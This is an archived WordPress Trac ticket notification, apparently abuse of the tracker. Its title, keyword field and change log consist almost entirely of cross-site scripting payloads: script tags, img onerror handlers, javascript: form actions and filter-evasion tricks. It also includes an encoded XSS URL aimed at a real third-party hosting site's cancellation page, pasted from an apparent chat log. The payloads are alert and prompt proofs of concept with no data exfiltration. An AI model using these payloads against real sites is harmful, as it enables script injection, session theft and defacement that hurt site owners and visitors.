[wp-trac] [WordPress Trac] #47786: ">><marquee><img src=x onerror=confirm(document.domain)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(document.domain) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29; >'"><img src="http: //i.imgur.com/P8mL8.jpg">)
WordPress Trac
noreply at wordpress.org
Fri Jul 26 18:08:43 UTC 2019
#47786: ">><marquee><img src=x onerror=confirm(document.domain)></marquee>"
></plaintext\></|\><plaintext/onmouseover=prompt(document.domain)
><script>prompt(1)</script>@gmail.com<isindex
formaction=javascript:alert(/XSS/) type=submit>'-->"
></script><script>alert(1)</script>"><img/id="confirm(
1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http:
//i.imgur.com/P8mL8.jpg">)
-------------------------------------------------+-------------------------
Reporter: harry008 | Owner: (none)
Type: feature request | Status: new
Priority: normal | Milestone: Awaiting
| Review
Component: General | Version: 5.2.1
Severity: normal | Resolution:
Keywords: [12:43 20/7/2019] Midhun S: | Focuses:
"><img/src/onerror=.1|alert`XSS`> [12:43 |
20/7/2019] Midhun S: |
https://www.interserver.net/cancelmyserver.php?email=ssds1%27%22%3E%3Cimg/src/onerror=.1|alert`XSS`%3E|
[12:43 20/7/2019] Midhun S: |
%27;%0d%0d});%0d{onerror=prompt}throw |
document.location</ScRipT// has-patch |
-------------------------------------------------+-------------------------
Changes (by harry008):
* Attachment "DSCN0010_small.2.jpg" added.
[12:43, 20/7/2019] Midhun S:
https://www.interserver.net/cancelmyserver.php?email=ssds1%27%22%3E%3Cimg/src/onerror=.1|alert`XSS`%3E
[12:43, 20/7/2019] Midhun S: %27;%0d%0d});%0d{onerror=prompt}throw
document.location</ScRipT//
--
Ticket URL: <https://core.trac.wordpress.org/ticket/47786>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list